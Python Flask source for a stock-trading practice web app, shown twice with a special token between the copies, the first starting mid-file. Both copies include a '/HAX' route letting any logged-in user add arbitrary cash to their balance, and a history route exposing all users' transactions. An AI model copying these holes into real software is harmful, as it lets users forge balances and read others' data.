db.execute('INSERT INTO users (username,hash) VALUES (?,?)',
request.form.get('username'), generate_password_hash(request.
form.get('password')))
return redirect('/')
else:
return render_template('register.html')
@app.route('/sell', methods=['GET', 'POST'])
@login_required
def sell():
"""Sell shares of stock"""
if request.method == 'POST':
if not request.form.get('shares'):
            return apology('Please enter how many shares you want to sell', 400)
sell = request.form.get('symbol')
shares = request.form.get('shares')
amount = db.execute(
'SELECT SUM(transactions) as amount FROM record WHERE userID=? AND symbol=? GROUP BY symbol HAVING transactions'
, session['user_id'], sell)
if amount[0]['amount'] < int(shares):
            return apology('You do not own that many shares', 400)
quote = lookup(sell)
price = quote['price']
total = int(price) * int(shares)
db.execute(
"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%s','now'))"
, session['user_id'], int(shares) * -1, quote['symbol'], price)
db.execute('UPDATE users SET cash=cash+ (?) WHERE id=?', total,
session['user_id'])
return redirect('/')
else:
rows = db.execute(
'SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions'
, session['user_id'])
return render_template('sell.html', rows=rows)
@app.route('/HAX', methods=['GET', 'POST'])
@login_required
def HAX():
if request.method == 'POST':
total = request.form.get('HAX')
db.execute('UPDATE users SET cash=cash+ (?) WHERE id=?', total,
session['user_id'])
flash(u'HAX SUCCESSFULLY ACTIVATED!!!')
return redirect('/')
else:
return render_template('HAX.html')
def errorhandler(e):
"""Handle error"""
if not isinstance(e, HTTPException):
e = InternalServerError()
return apology(e.name, e.code)
for code in default_exceptions:
app.errorhandler(code)(errorhandler)
<|reserved_special_token_1|>
import os
from cs50 import SQL
from flask import Flask, flash, redirect, render_template, request, session
from flask_session import Session
from tempfile import mkdtemp
from werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError
from werkzeug.security import check_password_hash, generate_password_hash
from helpers import apology, login_required, lookup, usd
# Configure application
app = Flask(__name__)
# Ensure templates are auto-reloaded
app.config["TEMPLATES_AUTO_RELOAD"] = True
# Ensure responses aren't cached
@app.after_request
def after_request(response):
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
# Custom filter
app.jinja_env.filters["usd"] = usd
# Configure session to use filesystem (instead of signed cookies)
app.config["SESSION_FILE_DIR"] = mkdtemp()
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
# Configure CS50 Library to use SQLite database
db = SQL("sqlite:///finance.db")
# Make sure API key is set
if not os.environ.get("API_KEY"):
raise RuntimeError("API_KEY not set")
@app.route("/")
@login_required
def index():
"""Show portfolio of stocks"""
rows=db.execute("SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions",session["user_id"])
cash=db.execute("SELECT cash FROM users WHERE id=?",session["user_id"])
cash_=cash[0]["cash"]
    # store all the data in a dict so it's easier to pass into the HTML template
display=[]
total_share=0
for row in rows:
symbol=str(row["symbol"])
print(symbol)
name=lookup(symbol)["name"]
shares=int(row["amount"])
price=float(lookup(symbol)["price"])
total=float(shares) *price
total_share+=total
display.append({'symbol':symbol, 'name':name, 'shares':shares, 'price':price, 'total':total})
total_money=total_share+cash[0]["cash"]
return render_template("index.html",display=display,total_money=total_money,cash=cash_)
@app.route("/buy", methods=["GET", "POST"])
@login_required
def buy():
"""Buy shares of stock"""
if request.method == "POST":
# Ensure symbol was submitted
if not request.form.get("symbol"):
return apology("must provide symbol", 400)
# Ensure shares was submitted
elif not request.form.get("shares"):
return apology("must provide shares", 400)
if not request.form.get("shares").isdigit():
return apology("must be integer",400)
elif int(request.form.get("shares"))<1 :
return apology("must be positive integer", 400)
elif lookup(request.form.get("symbol"))==None:
return apology("Must be a valid symbol",400)
#ensure money>price
quote=lookup(request.form.get("symbol"))
shares=request.form.get("shares")
cash=db.execute("SELECT cash FROM users WHERE id=?",session["user_id"])
if cash[0]["cash"]<int(quote["price"])*int(shares):
return apology("You can't affort this/these",400)
#BUY, STORE DATA IN REPOSITORY AND RECORD
#record this transaction
db.execute("INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%Y-%m-%d %H:%M:%S','now'))",session["user_id"],int(shares),quote["symbol"],float(quote["price"]))
#deduct the cash
total=int(quote["price"])*int(shares)
db.execute("UPDATE users SET cash=cash- (?) WHERE id=?",total,session["user_id"])
return redirect("/")
else:
return render_template("buy.html")
@app.route("/history")
@login_required
def history():
"""Show history of transactions"""
rows=db.execute("SELECT * FROM record ORDER BY t1")
return render_template("history.html",rows=rows)
@app.route("/login", methods=["GET", "POST"])
def login():
"""Log user in"""
# Forget any user_id
session.clear()
# User reached route via POST (as by submitting a form via POST)
if request.method == "POST":
# Ensure username was submitted
if not request.form.get("username"):
return apology("must provide username", 403)
# Ensure password was submitted
elif not request.form.get("password"):
return apology("must provide password", 403)
# Query database for username
rows = db.execute("SELECT * FROM users WHERE username = ?", request.form.get("username"))
# Ensure username exists and password is correct
if len(rows) != 1 or not check_password_hash(rows[0]["hash"], request.form.get("password")):
return apology("invalid username and/or password", 403)
# Remember which user has logged in
session["user_id"] = rows[0]["id"]
# Redirect user to home page
return redirect("/")
# User reached route via GET (as by clicking a link or via redirect)
else:
return render_template("login.html")
@app.route("/logout")
def logout():
"""Log user out"""
# Forget any user_id
session.clear()
# Redirect user to login form
return redirect("/")
@app.route("/quote", methods=["GET", "POST"])
@login_required
def quote():
"""Get stock quote."""
if request.method=="POST":
quote=lookup(request.form.get("symbol"))
if quote==None:
return apology("Invalid symbol",400)
price=usd(quote["price"])
return render_template("quoted.html",quote=quote,price=price)
else:
return render_template("quote.html")
@app.route("/register", methods=["GET", "POST"])
def register():
"""Register user"""
if request.method == "POST":
# Ensure username was submitted
if not request.form.get("username"):
return apology("must provide username", 400)
# Ensure password was submitted
elif not request.form.get("password"):
return apology("must provide password", 400)
        # Ensure password confirmation was submitted
elif not request.form.get("confirmation"):
return apology("must comfirm password", 400)
# Ensure password matches
elif request.form.get("confirmation") != request.form.get("password"):
return apology("Password not matches",400)
# Ensure username is new(unique)
rows = db.execute("SELECT * FROM users WHERE username = ?", request.form.get("username"))
if len(rows) != 0:
return apology("username used", 400)
db.execute("INSERT INTO users (username,hash) VALUES (?,?)",request.form.get("username"),generate_password_hash(request.form.get("password")))
# Redirect user to home page
return redirect("/")
else:
return render_template("register.html")
@app.route("/sell", methods=["GET", "POST"])
@login_required
def sell():
"""Sell shares of stock"""
if request.method=='POST':
#parameter is not filled
if not request.form.get("shares"):
return apology("Please enter how much u want to sell",400)
        # check that the user owns at least as many shares as they are trying to sell
sell=request.form.get("symbol")
shares=request.form.get("shares")
amount=db.execute("SELECT SUM(transactions) as amount FROM record WHERE userID=? AND symbol=? GROUP BY symbol HAVING transactions",session["user_id"],sell)
if amount[0]["amount"]<int(shares):
return apology("You dont own that much shares",400)
#record sell and add cash amount
quote=lookup(sell)
price=quote["price"]
total=int(price)*int(shares)
db.execute("INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%s','now'))",session["user_id"],(int(shares)*-1),quote["symbol"],price)
db.execute("UPDATE users SET cash=cash+ (?) WHERE id=?",total,session["user_id"])
return redirect("/")
else:
rows=db.execute("SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions",session["user_id"])
return render_template("sell.html",rows=rows)
@app.route("/HAX", methods=["GET", "POST"])
@login_required
def HAX():
    # add free cash to the logged-in user's account (cheat/debug route)
if request.method=="POST":
total=request.form.get("HAX")
db.execute("UPDATE users SET cash=cash+ (?) WHERE id=?",total,session["user_id"])
flash(u'HAX SUCCESSFULLY ACTIVATED!!!')
return redirect("/")
else:
return render_template("HAX.html")
def errorhandler(e):
"""Handle error"""
if not isinstance(e, HTTPException):
e = InternalServerError()
return apology(e.name, e.code)
# Listen for errors
for code in default_exceptions:
app.errorhandler(code)(errorhandler)
|
flexible
|
{
"blob_id": "c66f4ee5719f764c8c713c23815302c00b6fb9af",
"index": 310,
"step-1": "<mask token>\n\n\[email protected]('/buy', methods=['GET', 'POST'])\n@login_required\ndef buy():\n \"\"\"Buy shares of stock\"\"\"\n if request.method == 'POST':\n if not request.form.get('symbol'):\n return apology('must provide symbol', 400)\n elif not request.form.get('shares'):\n return apology('must provide shares', 400)\n if not request.form.get('shares').isdigit():\n return apology('must be integer', 400)\n elif int(request.form.get('shares')) < 1:\n return apology('must be positive integer', 400)\n elif lookup(request.form.get('symbol')) == None:\n return apology('Must be a valid symbol', 400)\n quote = lookup(request.form.get('symbol'))\n shares = request.form.get('shares')\n cash = db.execute('SELECT cash FROM users WHERE id=?', session[\n 'user_id'])\n if cash[0]['cash'] < int(quote['price']) * int(shares):\n return apology(\"You can't affort this/these\", 400)\n db.execute(\n \"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%Y-%m-%d %H:%M:%S','now'))\"\n , session['user_id'], int(shares), quote['symbol'], float(quote\n ['price']))\n total = int(quote['price']) * int(shares)\n db.execute('UPDATE users SET cash=cash- (?) WHERE id=?', total,\n session['user_id'])\n return redirect('/')\n else:\n return render_template('buy.html')\n\n\n<mask token>\n\n\[email protected]('/logout')\ndef logout():\n \"\"\"Log user out\"\"\"\n session.clear()\n return redirect('/')\n\n\n<mask token>\n\n\[email protected]('/register', methods=['GET', 'POST'])\ndef register():\n \"\"\"Register user\"\"\"\n if request.method == 'POST':\n if not request.form.get('username'):\n return apology('must provide username', 400)\n elif not request.form.get('password'):\n return apology('must provide password', 400)\n elif not request.form.get('confirmation'):\n return apology('must comfirm password', 400)\n elif request.form.get('confirmation') != request.form.get('password'):\n return apology('Password not matches', 400)\n rows = db.execute('SELECT * FROM users WHERE username = ?', request\n .form.get('username'))\n if len(rows) != 0:\n return apology('username used', 400)\n db.execute('INSERT INTO users (username,hash) VALUES (?,?)',\n request.form.get('username'), generate_password_hash(request.\n form.get('password')))\n return redirect('/')\n else:\n return render_template('register.html')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]_request\ndef after_request(response):\n response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'\n response.headers['Expires'] = 0\n response.headers['Pragma'] = 'no-cache'\n return response\n\n\n<mask token>\n\n\[email protected]('/')\n@login_required\ndef index():\n \"\"\"Show portfolio of stocks\"\"\"\n rows = db.execute(\n 'SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions'\n , session['user_id'])\n cash = db.execute('SELECT cash FROM users WHERE id=?', session['user_id'])\n cash_ = cash[0]['cash']\n display = []\n total_share = 0\n for row in rows:\n symbol = str(row['symbol'])\n print(symbol)\n name = lookup(symbol)['name']\n shares = int(row['amount'])\n price = float(lookup(symbol)['price'])\n total = float(shares) * price\n total_share += total\n display.append({'symbol': symbol, 'name': name, 'shares': shares,\n 'price': price, 'total': total})\n total_money = total_share + cash[0]['cash']\n return render_template('index.html', display=display, total_money=\n total_money, cash=cash_)\n\n\[email protected]('/buy', methods=['GET', 'POST'])\n@login_required\ndef buy():\n \"\"\"Buy shares of stock\"\"\"\n if request.method == 'POST':\n if not request.form.get('symbol'):\n return apology('must provide symbol', 400)\n elif not request.form.get('shares'):\n return apology('must provide shares', 400)\n if not request.form.get('shares').isdigit():\n return apology('must be integer', 400)\n elif int(request.form.get('shares')) < 1:\n return apology('must be positive integer', 400)\n elif lookup(request.form.get('symbol')) == None:\n return apology('Must be a valid symbol', 400)\n quote = lookup(request.form.get('symbol'))\n shares = request.form.get('shares')\n cash = db.execute('SELECT cash FROM users WHERE id=?', session[\n 'user_id'])\n if cash[0]['cash'] < int(quote['price']) * int(shares):\n return apology(\"You can't affort this/these\", 400)\n db.execute(\n \"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%Y-%m-%d %H:%M:%S','now'))\"\n , session['user_id'], int(shares), quote['symbol'], float(quote\n ['price']))\n total = int(quote['price']) * int(shares)\n db.execute('UPDATE users SET cash=cash- (?) 
WHERE id=?', total,\n session['user_id'])\n return redirect('/')\n else:\n return render_template('buy.html')\n\n\n<mask token>\n\n\[email protected]('/login', methods=['GET', 'POST'])\ndef login():\n \"\"\"Log user in\"\"\"\n session.clear()\n if request.method == 'POST':\n if not request.form.get('username'):\n return apology('must provide username', 403)\n elif not request.form.get('password'):\n return apology('must provide password', 403)\n rows = db.execute('SELECT * FROM users WHERE username = ?', request\n .form.get('username'))\n if len(rows) != 1 or not check_password_hash(rows[0]['hash'],\n request.form.get('password')):\n return apology('invalid username and/or password', 403)\n session['user_id'] = rows[0]['id']\n return redirect('/')\n else:\n return render_template('login.html')\n\n\[email protected]('/logout')\ndef logout():\n \"\"\"Log user out\"\"\"\n session.clear()\n return redirect('/')\n\n\[email protected]('/quote', methods=['GET', 'POST'])\n@login_required\ndef quote():\n \"\"\"Get stock quote.\"\"\"\n if request.method == 'POST':\n quote = lookup(request.form.get('symbol'))\n if quote == None:\n return apology('Invalid symbol', 400)\n price = usd(quote['price'])\n return render_template('quoted.html', quote=quote, price=price)\n else:\n return render_template('quote.html')\n\n\[email protected]('/register', methods=['GET', 'POST'])\ndef register():\n \"\"\"Register user\"\"\"\n if request.method == 'POST':\n if not request.form.get('username'):\n return apology('must provide username', 400)\n elif not request.form.get('password'):\n return apology('must provide password', 400)\n elif not request.form.get('confirmation'):\n return apology('must comfirm password', 400)\n elif request.form.get('confirmation') != request.form.get('password'):\n return apology('Password not matches', 400)\n rows = db.execute('SELECT * FROM users WHERE username = ?', request\n .form.get('username'))\n if len(rows) != 0:\n return apology('username used', 400)\n db.execute('INSERT INTO users (username,hash) VALUES (?,?)',\n request.form.get('username'), generate_password_hash(request.\n form.get('password')))\n return redirect('/')\n else:\n return render_template('register.html')\n\n\n<mask token>\n\n\[email protected]('/HAX', methods=['GET', 'POST'])\n@login_required\ndef HAX():\n if request.method == 'POST':\n total = request.form.get('HAX')\n db.execute('UPDATE users SET cash=cash+ (?) WHERE id=?', total,\n session['user_id'])\n flash(u'HAX SUCCESSFULLY ACTIVATED!!!')\n return redirect('/')\n else:\n return render_template('HAX.html')\n\n\ndef errorhandler(e):\n \"\"\"Handle error\"\"\"\n if not isinstance(e, HTTPException):\n e = InternalServerError()\n return apology(e.name, e.code)\n\n\n<mask token>\n",
"step-3": "<mask token>\napp = Flask(__name__)\napp.config['TEMPLATES_AUTO_RELOAD'] = True\n\n\[email protected]_request\ndef after_request(response):\n response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'\n response.headers['Expires'] = 0\n response.headers['Pragma'] = 'no-cache'\n return response\n\n\napp.jinja_env.filters['usd'] = usd\napp.config['SESSION_FILE_DIR'] = mkdtemp()\napp.config['SESSION_PERMANENT'] = False\napp.config['SESSION_TYPE'] = 'filesystem'\nSession(app)\ndb = SQL('sqlite:///finance.db')\nif not os.environ.get('API_KEY'):\n raise RuntimeError('API_KEY not set')\n\n\[email protected]('/')\n@login_required\ndef index():\n \"\"\"Show portfolio of stocks\"\"\"\n rows = db.execute(\n 'SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions'\n , session['user_id'])\n cash = db.execute('SELECT cash FROM users WHERE id=?', session['user_id'])\n cash_ = cash[0]['cash']\n display = []\n total_share = 0\n for row in rows:\n symbol = str(row['symbol'])\n print(symbol)\n name = lookup(symbol)['name']\n shares = int(row['amount'])\n price = float(lookup(symbol)['price'])\n total = float(shares) * price\n total_share += total\n display.append({'symbol': symbol, 'name': name, 'shares': shares,\n 'price': price, 'total': total})\n total_money = total_share + cash[0]['cash']\n return render_template('index.html', display=display, total_money=\n total_money, cash=cash_)\n\n\[email protected]('/buy', methods=['GET', 'POST'])\n@login_required\ndef buy():\n \"\"\"Buy shares of stock\"\"\"\n if request.method == 'POST':\n if not request.form.get('symbol'):\n return apology('must provide symbol', 400)\n elif not request.form.get('shares'):\n return apology('must provide shares', 400)\n if not request.form.get('shares').isdigit():\n return apology('must be integer', 400)\n elif int(request.form.get('shares')) < 1:\n return apology('must be positive integer', 400)\n elif lookup(request.form.get('symbol')) == None:\n return apology('Must be a valid symbol', 400)\n quote = lookup(request.form.get('symbol'))\n shares = request.form.get('shares')\n cash = db.execute('SELECT cash FROM users WHERE id=?', session[\n 'user_id'])\n if cash[0]['cash'] < int(quote['price']) * int(shares):\n return apology(\"You can't affort this/these\", 400)\n db.execute(\n \"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%Y-%m-%d %H:%M:%S','now'))\"\n , session['user_id'], int(shares), quote['symbol'], float(quote\n ['price']))\n total = int(quote['price']) * int(shares)\n db.execute('UPDATE users SET cash=cash- (?) 
WHERE id=?', total,\n session['user_id'])\n return redirect('/')\n else:\n return render_template('buy.html')\n\n\[email protected]('/history')\n@login_required\ndef history():\n \"\"\"Show history of transactions\"\"\"\n rows = db.execute('SELECT * FROM record ORDER BY t1')\n return render_template('history.html', rows=rows)\n\n\[email protected]('/login', methods=['GET', 'POST'])\ndef login():\n \"\"\"Log user in\"\"\"\n session.clear()\n if request.method == 'POST':\n if not request.form.get('username'):\n return apology('must provide username', 403)\n elif not request.form.get('password'):\n return apology('must provide password', 403)\n rows = db.execute('SELECT * FROM users WHERE username = ?', request\n .form.get('username'))\n if len(rows) != 1 or not check_password_hash(rows[0]['hash'],\n request.form.get('password')):\n return apology('invalid username and/or password', 403)\n session['user_id'] = rows[0]['id']\n return redirect('/')\n else:\n return render_template('login.html')\n\n\[email protected]('/logout')\ndef logout():\n \"\"\"Log user out\"\"\"\n session.clear()\n return redirect('/')\n\n\[email protected]('/quote', methods=['GET', 'POST'])\n@login_required\ndef quote():\n \"\"\"Get stock quote.\"\"\"\n if request.method == 'POST':\n quote = lookup(request.form.get('symbol'))\n if quote == None:\n return apology('Invalid symbol', 400)\n price = usd(quote['price'])\n return render_template('quoted.html', quote=quote, price=price)\n else:\n return render_template('quote.html')\n\n\[email protected]('/register', methods=['GET', 'POST'])\ndef register():\n \"\"\"Register user\"\"\"\n if request.method == 'POST':\n if not request.form.get('username'):\n return apology('must provide username', 400)\n elif not request.form.get('password'):\n return apology('must provide password', 400)\n elif not request.form.get('confirmation'):\n return apology('must comfirm password', 400)\n elif request.form.get('confirmation') != request.form.get('password'):\n return apology('Password not matches', 400)\n rows = db.execute('SELECT * FROM users WHERE username = ?', request\n .form.get('username'))\n if len(rows) != 0:\n return apology('username used', 400)\n db.execute('INSERT INTO users (username,hash) VALUES (?,?)',\n request.form.get('username'), generate_password_hash(request.\n form.get('password')))\n return redirect('/')\n else:\n return render_template('register.html')\n\n\[email protected]('/sell', methods=['GET', 'POST'])\n@login_required\ndef sell():\n \"\"\"Sell shares of stock\"\"\"\n if request.method == 'POST':\n if not request.form.get('shares'):\n return apology('Please enter how much u want to sell', 400)\n sell = request.form.get('symbol')\n shares = request.form.get('shares')\n amount = db.execute(\n 'SELECT SUM(transactions) as amount FROM record WHERE userID=? AND symbol=? GROUP BY symbol HAVING transactions'\n , session['user_id'], sell)\n if amount[0]['amount'] < int(shares):\n return apology('You dont own that much shares', 400)\n quote = lookup(sell)\n price = quote['price']\n total = int(price) * int(shares)\n db.execute(\n \"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%s','now'))\"\n , session['user_id'], int(shares) * -1, quote['symbol'], price)\n db.execute('UPDATE users SET cash=cash+ (?) WHERE id=?', total,\n session['user_id'])\n return redirect('/')\n else:\n rows = db.execute(\n 'SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? 
GROUP BY symbol HAVING transactions'\n , session['user_id'])\n return render_template('sell.html', rows=rows)\n\n\[email protected]('/HAX', methods=['GET', 'POST'])\n@login_required\ndef HAX():\n if request.method == 'POST':\n total = request.form.get('HAX')\n db.execute('UPDATE users SET cash=cash+ (?) WHERE id=?', total,\n session['user_id'])\n flash(u'HAX SUCCESSFULLY ACTIVATED!!!')\n return redirect('/')\n else:\n return render_template('HAX.html')\n\n\ndef errorhandler(e):\n \"\"\"Handle error\"\"\"\n if not isinstance(e, HTTPException):\n e = InternalServerError()\n return apology(e.name, e.code)\n\n\nfor code in default_exceptions:\n app.errorhandler(code)(errorhandler)\n",
"step-4": "import os\nfrom cs50 import SQL\nfrom flask import Flask, flash, redirect, render_template, request, session\nfrom flask_session import Session\nfrom tempfile import mkdtemp\nfrom werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError\nfrom werkzeug.security import check_password_hash, generate_password_hash\nfrom helpers import apology, login_required, lookup, usd\napp = Flask(__name__)\napp.config['TEMPLATES_AUTO_RELOAD'] = True\n\n\[email protected]_request\ndef after_request(response):\n response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'\n response.headers['Expires'] = 0\n response.headers['Pragma'] = 'no-cache'\n return response\n\n\napp.jinja_env.filters['usd'] = usd\napp.config['SESSION_FILE_DIR'] = mkdtemp()\napp.config['SESSION_PERMANENT'] = False\napp.config['SESSION_TYPE'] = 'filesystem'\nSession(app)\ndb = SQL('sqlite:///finance.db')\nif not os.environ.get('API_KEY'):\n raise RuntimeError('API_KEY not set')\n\n\[email protected]('/')\n@login_required\ndef index():\n \"\"\"Show portfolio of stocks\"\"\"\n rows = db.execute(\n 'SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions'\n , session['user_id'])\n cash = db.execute('SELECT cash FROM users WHERE id=?', session['user_id'])\n cash_ = cash[0]['cash']\n display = []\n total_share = 0\n for row in rows:\n symbol = str(row['symbol'])\n print(symbol)\n name = lookup(symbol)['name']\n shares = int(row['amount'])\n price = float(lookup(symbol)['price'])\n total = float(shares) * price\n total_share += total\n display.append({'symbol': symbol, 'name': name, 'shares': shares,\n 'price': price, 'total': total})\n total_money = total_share + cash[0]['cash']\n return render_template('index.html', display=display, total_money=\n total_money, cash=cash_)\n\n\[email protected]('/buy', methods=['GET', 'POST'])\n@login_required\ndef buy():\n \"\"\"Buy shares of stock\"\"\"\n if request.method == 'POST':\n if not request.form.get('symbol'):\n return apology('must provide symbol', 400)\n elif not request.form.get('shares'):\n return apology('must provide shares', 400)\n if not request.form.get('shares').isdigit():\n return apology('must be integer', 400)\n elif int(request.form.get('shares')) < 1:\n return apology('must be positive integer', 400)\n elif lookup(request.form.get('symbol')) == None:\n return apology('Must be a valid symbol', 400)\n quote = lookup(request.form.get('symbol'))\n shares = request.form.get('shares')\n cash = db.execute('SELECT cash FROM users WHERE id=?', session[\n 'user_id'])\n if cash[0]['cash'] < int(quote['price']) * int(shares):\n return apology(\"You can't affort this/these\", 400)\n db.execute(\n \"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%Y-%m-%d %H:%M:%S','now'))\"\n , session['user_id'], int(shares), quote['symbol'], float(quote\n ['price']))\n total = int(quote['price']) * int(shares)\n db.execute('UPDATE users SET cash=cash- (?) 
WHERE id=?', total,\n session['user_id'])\n return redirect('/')\n else:\n return render_template('buy.html')\n\n\[email protected]('/history')\n@login_required\ndef history():\n \"\"\"Show history of transactions\"\"\"\n rows = db.execute('SELECT * FROM record ORDER BY t1')\n return render_template('history.html', rows=rows)\n\n\[email protected]('/login', methods=['GET', 'POST'])\ndef login():\n \"\"\"Log user in\"\"\"\n session.clear()\n if request.method == 'POST':\n if not request.form.get('username'):\n return apology('must provide username', 403)\n elif not request.form.get('password'):\n return apology('must provide password', 403)\n rows = db.execute('SELECT * FROM users WHERE username = ?', request\n .form.get('username'))\n if len(rows) != 1 or not check_password_hash(rows[0]['hash'],\n request.form.get('password')):\n return apology('invalid username and/or password', 403)\n session['user_id'] = rows[0]['id']\n return redirect('/')\n else:\n return render_template('login.html')\n\n\[email protected]('/logout')\ndef logout():\n \"\"\"Log user out\"\"\"\n session.clear()\n return redirect('/')\n\n\[email protected]('/quote', methods=['GET', 'POST'])\n@login_required\ndef quote():\n \"\"\"Get stock quote.\"\"\"\n if request.method == 'POST':\n quote = lookup(request.form.get('symbol'))\n if quote == None:\n return apology('Invalid symbol', 400)\n price = usd(quote['price'])\n return render_template('quoted.html', quote=quote, price=price)\n else:\n return render_template('quote.html')\n\n\[email protected]('/register', methods=['GET', 'POST'])\ndef register():\n \"\"\"Register user\"\"\"\n if request.method == 'POST':\n if not request.form.get('username'):\n return apology('must provide username', 400)\n elif not request.form.get('password'):\n return apology('must provide password', 400)\n elif not request.form.get('confirmation'):\n return apology('must comfirm password', 400)\n elif request.form.get('confirmation') != request.form.get('password'):\n return apology('Password not matches', 400)\n rows = db.execute('SELECT * FROM users WHERE username = ?', request\n .form.get('username'))\n if len(rows) != 0:\n return apology('username used', 400)\n db.execute('INSERT INTO users (username,hash) VALUES (?,?)',\n request.form.get('username'), generate_password_hash(request.\n form.get('password')))\n return redirect('/')\n else:\n return render_template('register.html')\n\n\[email protected]('/sell', methods=['GET', 'POST'])\n@login_required\ndef sell():\n \"\"\"Sell shares of stock\"\"\"\n if request.method == 'POST':\n if not request.form.get('shares'):\n return apology('Please enter how much u want to sell', 400)\n sell = request.form.get('symbol')\n shares = request.form.get('shares')\n amount = db.execute(\n 'SELECT SUM(transactions) as amount FROM record WHERE userID=? AND symbol=? GROUP BY symbol HAVING transactions'\n , session['user_id'], sell)\n if amount[0]['amount'] < int(shares):\n return apology('You dont own that much shares', 400)\n quote = lookup(sell)\n price = quote['price']\n total = int(price) * int(shares)\n db.execute(\n \"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%s','now'))\"\n , session['user_id'], int(shares) * -1, quote['symbol'], price)\n db.execute('UPDATE users SET cash=cash+ (?) WHERE id=?', total,\n session['user_id'])\n return redirect('/')\n else:\n rows = db.execute(\n 'SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? 
GROUP BY symbol HAVING transactions'\n , session['user_id'])\n return render_template('sell.html', rows=rows)\n\n\[email protected]('/HAX', methods=['GET', 'POST'])\n@login_required\ndef HAX():\n if request.method == 'POST':\n total = request.form.get('HAX')\n db.execute('UPDATE users SET cash=cash+ (?) WHERE id=?', total,\n session['user_id'])\n flash(u'HAX SUCCESSFULLY ACTIVATED!!!')\n return redirect('/')\n else:\n return render_template('HAX.html')\n\n\ndef errorhandler(e):\n \"\"\"Handle error\"\"\"\n if not isinstance(e, HTTPException):\n e = InternalServerError()\n return apology(e.name, e.code)\n\n\nfor code in default_exceptions:\n app.errorhandler(code)(errorhandler)\n",
"step-5": "import os\n\nfrom cs50 import SQL\nfrom flask import Flask, flash, redirect, render_template, request, session\nfrom flask_session import Session\nfrom tempfile import mkdtemp\nfrom werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError\nfrom werkzeug.security import check_password_hash, generate_password_hash\n\nfrom helpers import apology, login_required, lookup, usd\n\n# Configure application\napp = Flask(__name__)\n\n# Ensure templates are auto-reloaded\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\n\n\n# Ensure responses aren't cached\[email protected]_request\ndef after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n\n# Custom filter\napp.jinja_env.filters[\"usd\"] = usd\n\n# Configure session to use filesystem (instead of signed cookies)\napp.config[\"SESSION_FILE_DIR\"] = mkdtemp()\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n# Configure CS50 Library to use SQLite database\ndb = SQL(\"sqlite:///finance.db\")\n\n# Make sure API key is set\nif not os.environ.get(\"API_KEY\"):\n raise RuntimeError(\"API_KEY not set\")\n\n\[email protected](\"/\")\n@login_required\ndef index():\n \"\"\"Show portfolio of stocks\"\"\"\n rows=db.execute(\"SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions\",session[\"user_id\"])\n cash=db.execute(\"SELECT cash FROM users WHERE id=?\",session[\"user_id\"])\n cash_=cash[0][\"cash\"]\n\n #store all the data into a dict so its easier to pass in to html\n display=[]\n total_share=0\n for row in rows:\n symbol=str(row[\"symbol\"])\n print(symbol)\n name=lookup(symbol)[\"name\"]\n shares=int(row[\"amount\"])\n price=float(lookup(symbol)[\"price\"])\n total=float(shares) *price\n total_share+=total\n display.append({'symbol':symbol, 'name':name, 'shares':shares, 'price':price, 'total':total})\n\n total_money=total_share+cash[0][\"cash\"]\n return render_template(\"index.html\",display=display,total_money=total_money,cash=cash_)\n\n\n\[email protected](\"/buy\", methods=[\"GET\", \"POST\"])\n@login_required\ndef buy():\n \"\"\"Buy shares of stock\"\"\"\n if request.method == \"POST\":\n\n # Ensure symbol was submitted\n if not request.form.get(\"symbol\"):\n return apology(\"must provide symbol\", 400)\n\n # Ensure shares was submitted\n elif not request.form.get(\"shares\"):\n return apology(\"must provide shares\", 400)\n\n if not request.form.get(\"shares\").isdigit():\n return apology(\"must be integer\",400)\n\n elif int(request.form.get(\"shares\"))<1 :\n return apology(\"must be positive integer\", 400)\n\n elif lookup(request.form.get(\"symbol\"))==None:\n return apology(\"Must be a valid symbol\",400)\n\n #ensure money>price\n quote=lookup(request.form.get(\"symbol\"))\n shares=request.form.get(\"shares\")\n cash=db.execute(\"SELECT cash FROM users WHERE id=?\",session[\"user_id\"])\n if cash[0][\"cash\"]<int(quote[\"price\"])*int(shares):\n return apology(\"You can't affort this/these\",400)\n\n #BUY, STORE DATA IN REPOSITORY AND RECORD\n\n #record this transaction\n db.execute(\"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%Y-%m-%d 